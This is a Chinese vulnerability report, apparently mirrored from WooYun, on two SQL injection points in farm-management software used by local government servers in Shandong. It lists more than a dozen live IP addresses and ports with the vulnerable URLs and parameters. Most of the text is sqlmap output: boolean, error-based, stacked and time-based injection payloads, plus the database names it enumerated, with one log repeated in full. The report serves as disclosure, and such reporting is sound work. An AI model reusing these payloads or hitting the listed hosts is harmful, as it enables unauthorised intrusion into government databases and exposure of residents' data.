某政府系统两处注入打包

来源

http://wooyun.org/bugs/wooyun-2015-089525

漏洞详情

贡献者 Knownsec 共获得 0KB

### 简要描述： RT ### 详细说明：山东农友软件公司官网:http://www.nongyou.com.cn/ 所有参数:tname和 CountryName都存在注入的。案例如下： http://218.56.99.84:8003/newSymSum/VillagePersonal2.aspx?tname=太河镇&CountryName=东同古村 http://222.135.109.70:8200/newSymSum/VillagePersonal2.aspx?tname=泽库镇&CountryName=辛立庄村 http://123.134.189.60:8022/newSymSum/VillagePersonal2.aspx?tname=牛泉镇&CountryName=西泉河 http://222.135.76.147:8200/newSymSum/VillagePersonal2.aspx?tname=斥山办事处&CountryName=西苏家村 http://218.58.124.131:8003/newSymSum/VillagePersonal2.aspx?tname=中央商务片区&CountryName=魏家社区 http://218.56.40.229:8037/newSymSum/VillagePersonal2.aspx?tname=毕郭镇&CountryName=庙子夼村 1.测试注入点:http://218.56.40.229:8037/newSymSum/VillagePersonal2.aspx?tname=毕郭镇&CountryName=庙子夼村 [<img src="https://images.seebug.org/upload/201412/31164230b7c29c9af24c38707734f299acb21c44.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31164230b7c29c9af24c38707734f299acb21c44.png) ``` sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: tname Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tname=???' AND 3360=3360 AND 'AunX'='AunX&CountryName=???? Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: tname=???' AND (SELECT 4079 FROM(SELECT COUNT(*),CONCAT(0x717565737 1,(SELECT (CASE WHEN (4079=4079) THEN 1 ELSE 0 END)),0x716f676a71,FLOOR(RAND(0)* 2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'MnDW'='MnDW&Count ryName=???? Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: tname=???'; SELECT SLEEP(5)-- &CountryName=???? Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: tname=???' AND SLEEP(5) AND 'nhiY'='nhiY&CountryName=???? --- [16:41:05] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 back-end DBMS: MySQL 5.0 [16:41:05] [INFO] fetching database names [16:41:35] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request [16:41:43] [INFO] the SQL query used returns 5503 entries [16:41:43] [INFO] retrieved: information_schema [16:41:45] [INFO] retrieved: commoa [16:41:46] [INFO] retrieved: commoa100001 [16:41:46] [INFO] retrieved: commoa100002 [16:41:47] [INFO] retrieved: commoa100003 [16:41:47] [INFO] retrieved: commoa100004 [16:41:48] [INFO] retrieved: commoa100005 [16:41:48] [INFO] retrieved: commoa100006 [16:41:48] [INFO] retrieved: commoa100007 [16:41:49] [INFO] retrieved: commoa100008 [16:41:49] [INFO] retrieved: commoa100009 [16:41:49] [INFO] retrieved: commoa100010 [16:41:50] [INFO] retrieved: commoa100011 [16:41:50] [INFO] retrieved: commoa100012 [16:41:51] [INFO] retrieved: commoa100013 [16:41:51] [INFO] retrieved: commoa100014 [16:41:51] [INFO] retrieved: commoa100015 [16:41:52] [INFO] retrieved: commoa100016 [16:41:52] [INFO] retrieved: commoa100017 [16:41:52] [INFO] retrieved: commoa100018 [16:41:53] [INFO] retrieved: commoa100019 [16:41:53] [INFO] retrieved: commoa100020 [16:41:55] [INFO] retrieved: commoa100021 [16:41:56] [INFO] retrieved: commoa100022 [16:41:56] [INFO] retrieved: commoa100023 [16:41:57] [INFO] retrieved: commoa100024 [16:41:57] [INFO] retrieved: commoa100025 [16:41:57] [INFO] retrieved: commoa100026 [16:41:58] [INFO] retrieved: commoa100027 [16:41:58] [INFO] retrieved: commoa100028 [16:41:59] [INFO] retrieved: commoa100029 [16:41:59] [INFO] retrieved: commoa100030 [16:41:59] [INFO] retrieved: commoa100031 [16:42:00] [INFO] retrieved: commoa100032 [16:42:00] [INFO] retrieved: commoa100033 [16:42:00] [INFO] retrieved: commoa100034 [16:42:01] [INFO] retrieved: commoa100035 [16:42:01] [INFO] retrieved: commoa100036 [16:42:02] [INFO] retrieved: commoa100037 [16:42:02] [INFO] retrieved: commoa100038 [16:42:02] [INFO] retrieved: commoa100039 [16:42:03] [INFO] retrieved: commoa100040 [16:42:03] [INFO] retrieved: commoa100041 [16:42:04] [INFO] retrieved: commoa100042 [16:42:04] [INFO] retrieved: commoa100043 [16:42:04] [INFO] retrieved: commoa100044 [16:42:05] [INFO] retrieved: commoa100045 [16:42:05] [INFO] retrieved: commoa100046 [16:42:07] [INFO] retrieved: commoa100047 [16:42:08] [INFO] retrieved: commoa100048 [16:42:08] [INFO] retrieved: commoa100049 [16:42:08] [INFO] retrieved: commoa100050 [16:42:09] [INFO] retrieved: commoa100051 [16:42:09] [INFO] retrieved: commoa100052 [16:42:10] [INFO] retrieved: commoa100053 [16:42:10] [INFO] retrieved: commoa100054 [16:42:12] [WARNING] user aborted during enumeration. sqlmap will display partia l output available databases [56]: [*] commoa [*] commoa100001 [*] commoa100002 [*] commoa100003 [*] commoa100004 [*] commoa100005 [*] commoa100006 [*] commoa100007 [*] commoa100008 [*] commoa100009 [*] commoa100010 [*] commoa100011 [*] commoa100012 [*] commoa100013 [*] commoa100014 [*] commoa100015 [*] commoa100016 [*] commoa100017 [*] commoa100018 [*] commoa100019 [*] commoa100020 [*] commoa100021 [*] commoa100022 [*] commoa100023 [*] commoa100024 [*] commoa100025 [*] commoa100026 [*] commoa100027 [*] commoa100028 [*] commoa100029 [*] commoa100030 [*] commoa100031 [*] commoa100032 [*] commoa100033 [*] commoa100034 [*] commoa100035 [*] commoa100036 [*] commoa100037 [*] commoa100038 [*] commoa100039 [*] commoa100040 [*] commoa100041 [*] commoa100042 [*] commoa100043 [*] commoa100044 [*] commoa100045 [*] commoa100046 [*] commoa100047 [*] commoa100048 [*] commoa100049 [*] commoa100050 [*] commoa100051 [*] commoa100052 [*] commoa100053 [*] commoa100054 [*] information_schema ``` 5000多表,没深入的跑了。我就测试这一个。其他均可复现。 ------------------------------------------------------------------- 第二处注入: http://218.58.124.131:8003/newSymSum/VillagePersonal3.aspx?tname=先进装备制造产业片区&CountryName=郭家村 http://222.135.76.147:8200/newSymSum/VillagePersonal3.aspx?tname=港西镇&CountryName=山后鞠家村 http://60.217.72.17:7081/newSymSum/VillagePersonal3.aspx?tname=新市镇&CountryName=王大褂村 http://222.135.109.70:8200/newSymSum/VillagePersonal3.aspx?tname=龙山办事处&CountryName=西楼 http://218.56.40.229:8053/newSymSum/VillagePersonal3.aspx?tname=城港路街道&CountryName=三间房 http://221.2.149.47:8200/newSymSum/VillagePersonal3.aspx?tname=滕家镇&CountryName=曹家沟 1.测试注入点:http://218.58.124.131:8003/newSymSum/VillagePersonal3.aspx?tname=先进装备制造产业片区&CountryName=郭家村 [<img src="https://images.seebug.org/upload/201412/311648048f13bed0fbf92ba0219b4027b4e41442.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/311648048f13bed0fbf92ba0219b4027b4e41442.png) ``` sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: tname Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tname=??????????' AND 7785=7785 AND 'FAej'='FAej&CountryName=??? Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: tname=??????????' AND (SELECT 8399 FROM(SELECT COUNT(*),CONCAT(0x71 62797171,(SELECT (CASE WHEN (8399=8399) THEN 1 ELSE 0 END)),0x716f617271,FLOOR(R AND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Ovog'='Ovo g&CountryName=??? Type: stacked queries Title: MySQL < 5.0.12 stacked queries (heavy query) Payload: tname=??????????'; SELECT BENCHMARK(5000000,MD5(0x72546e68))-- &Cou ntryName=??? Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: tname=??????????' AND 2926=BENCHMARK(5000000,MD5(0x71496377)) AND ' qbiT'='qbiT&CountryName=??? --- [16:47:55] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727 back-end DBMS: MySQL 5.0 [16:47:55] [INFO] fetching database names [16:47:55] [INFO] the SQL query used returns 17 entries [16:47:55] [INFO] retrieved: information_schema [16:47:55] [INFO] retrieved: cw_databasecomm0517 [16:47:55] [INFO] retrieved: cw_databasecomm22zbgaoxin [16:47:55] [INFO] retrieved: cw_databasecommxh [16:47:56] [INFO] retrieved: cw_databasezbgx [16:47:56] [INFO] retrieved: cwdbcommzbgx100001 [16:47:56] [INFO] retrieved: cwdbcommzbgx100002 [16:47:56] [INFO] retrieved: cwdbcommzbgx100003 [16:47:56] [INFO] retrieved: cwdbcommzbgx100004 [16:47:56] [INFO] retrieved: cwdbcommzbgx100005 [16:47:56] [INFO] retrieved: cwdbcommzbgx100007 [16:47:56] [INFO] retrieved: mysql [16:47:56] [INFO] retrieved: nl_zbgaoxin [16:47:56] [INFO] retrieved: ny_landgxlz [16:47:56] [INFO] retrieved: test [16:47:56] [INFO] retrieved: village-levelmajor33zbgaoxin [16:47:56] [INFO] retrieved: village-levelmajor33zbgaoxinqu available databases [17]: [*] cw_databasecomm0517 [*] cw_databasecomm22zbgaoxin [*] cw_databasecommxh [*] cw_databasezbgx [*] cwdbcommzbgx100001 [*] cwdbcommzbgx100002 [*] cwdbcommzbgx100003 [*] cwdbcommzbgx100004 [*] cwdbcommzbgx100005 [*] cwdbcommzbgx100007 [*] information_schema [*] mysql [*] nl_zbgaoxin [*] ny_landgxlz [*] test [*] village-levelmajor33zbgaoxin [*] village-levelmajor33zbgaoxinqu ``` 以上均可复现的。 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201412/311648048f13bed0fbf92ba0219b4027b4e41442.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/311648048f13bed0fbf92ba0219b4027b4e41442.png) ``` sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: tname Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tname=??????????' AND 7785=7785 AND 'FAej'='FAej&CountryName=??? Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: tname=??????????' AND (SELECT 8399 FROM(SELECT COUNT(*),CONCAT(0x71 62797171,(SELECT (CASE WHEN (8399=8399) THEN 1 ELSE 0 END)),0x716f617271,FLOOR(R AND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Ovog'='Ovo g&CountryName=??? Type: stacked queries Title: MySQL < 5.0.12 stacked queries (heavy query) Payload: tname=??????????'; SELECT BENCHMARK(5000000,MD5(0x72546e68))-- &Cou ntryName=??? Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: tname=??????????' AND 2926=BENCHMARK(5000000,MD5(0x71496377)) AND ' qbiT'='qbiT&CountryName=??? --- [16:47:55] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727 back-end DBMS: MySQL 5.0 [16:47:55] [INFO] fetching database names [16:47:55] [INFO] the SQL query used returns 17 entries [16:47:55] [INFO] retrieved: information_schema [16:47:55] [INFO] retrieved: cw_databasecomm0517 [16:47:55] [INFO] retrieved: cw_databasecomm22zbgaoxin [16:47:55] [INFO] retrieved: cw_databasecommxh [16:47:56] [INFO] retrieved: cw_databasezbgx [16:47:56] [INFO] retrieved: cwdbcommzbgx100001 [16:47:56] [INFO] retrieved: cwdbcommzbgx100002 [16:47:56] [INFO] retrieved: cwdbcommzbgx100003 [16:47:56] [INFO] retrieved: cwdbcommzbgx100004 [16:47:56] [INFO] retrieved: cwdbcommzbgx100005 [16:47:56] [INFO] retrieved: cwdbcommzbgx100007 [16:47:56] [INFO] retrieved: mysql [16:47:56] [INFO] retrieved: nl_zbgaoxin [16:47:56] [INFO] retrieved: ny_landgxlz [16:47:56] [INFO] retrieved: test [16:47:56] [INFO] retrieved: village-levelmajor33zbgaoxin [16:47:56] [INFO] retrieved: village-levelmajor33zbgaoxinqu available databases [17]: [*] cw_databasecomm0517 [*] cw_databasecomm22zbgaoxin [*] cw_databasecommxh [*] cw_databasezbgx [*] cwdbcommzbgx100001 [*] cwdbcommzbgx100002 [*] cwdbcommzbgx100003 [*] cwdbcommzbgx100004 [*] cwdbcommzbgx100005 [*] cwdbcommzbgx100007 [*] information_schema [*] mysql [*] nl_zbgaoxin [*] ny_landgxlz [*] test [*] village-levelmajor33zbgaoxin [*] village-levelmajor33zbgaoxinqu ```

共 0 兑换了

PoC

暂无 PoC

参考链接

http://wooyun.org/bugs/wooyun-2015-089525

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

某政府系统两处注入打包

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定